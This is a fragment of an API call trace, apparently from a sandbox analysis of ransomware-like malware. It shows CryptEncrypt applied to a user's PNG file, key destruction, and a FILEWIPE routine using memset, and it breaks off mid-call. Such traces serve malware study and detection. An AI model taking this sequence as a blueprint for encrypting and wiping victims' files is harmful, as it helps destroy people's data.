[0039.798] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0039.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0039.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0039.798] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.798] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0039.798] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0039.798] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0039.798] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.798] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0039.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0039.798] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.798] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0039.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0039.798] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.799] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.799] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.799] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0039.799] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.799] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0039.799] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.799] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.799] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x4e3f, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x4e40) returned 1 [0039.799] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.799] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0039.799] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.799] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.799] CharLowerBuffW (in: lpsz="byte[20033]", cchLength=0xb | out: lpsz="byte[20033]") returned 0xb [0039.799] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.800] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.800] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.800] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.800] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.800] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xaceaf0*, pdwDataLen=0x6ae220*=0x4e3f, dwBufLen=0x4e40 | out: pbData=0xaceaf0*, pdwDataLen=0x6ae220*=0x4e40) returned 1 [0039.800] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.800] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0039.800] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.800] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.800] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.800] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.800] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0039.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0039.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.800] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.801] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0039.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.801] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.801] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0039.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0039.801] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.801] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.801] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0039.801] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0039.801] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0039.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0039.801] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.801] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.801] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0039.801] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.803] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.803] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.803] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0039.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.803] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.803] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.803] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0039.803] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.803] CryptDestroyKey (hKey=0x7c2200) returned 1 [0039.803] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.803] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.803] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0039.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0039.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.804] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0039.804] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0039.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.804] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0039.804] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0039.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0039.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0039.804] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0039.804] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.804] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0039.804] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0039.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0039.804] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0039.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0039.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0039.804] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.804] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.804] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.804] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0039.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0039.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.804] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.804] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0039.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.804] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.805] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0039.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0039.805] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.805] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0039.805] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0039.805] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.805] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0039.805] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0039.805] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0039.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0039.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0039.805] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0039.805] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.805] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0039.805] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.805] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.805] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0039.805] FreeLibrary (hLibModule=0x754b0000) returned 1 [0039.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0039.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0039.805] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0039.806] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0039.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0039.806] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.806] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.807] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.807] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.807] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0039.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0039.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0039.807] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.807] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.807] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\80l2TDxo4fCaf.png", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9f64d90, ftCreationTime.dwHighDateTime=0x1d5be9e, ftLastAccessTime.dwLowDateTime=0x1e377b00, ftLastAccessTime.dwHighDateTime=0x1d5c2d6, ftLastWriteTime.dwLowDateTime=0x1e377b00, ftLastWriteTime.dwHighDateTime=0x1d5c2d6, nFileSizeHigh=0x0, nFileSizeLow=0x4e3f, dwReserved0=0x0, dwReserved1=0x777648, cFileName="80l2TDxo4fCaf.png", cAlternateFileName="80L2TD~1.PNG")) returned 0x7c2240 [0039.807] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0039.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0039.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0039.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0039.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.808] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.808] CharLowerBuffW (in: lpsz="byte[20031]", cchLength=0xb | out: lpsz="byte[20031]") returned 0xb [0039.808] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.808] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0039.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0039.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0039.808] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.808] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0039.808] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0039.808] FreeLibrary (hLibModule=0x76b40000) returned 1 [0039.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0039.808] HeapFree 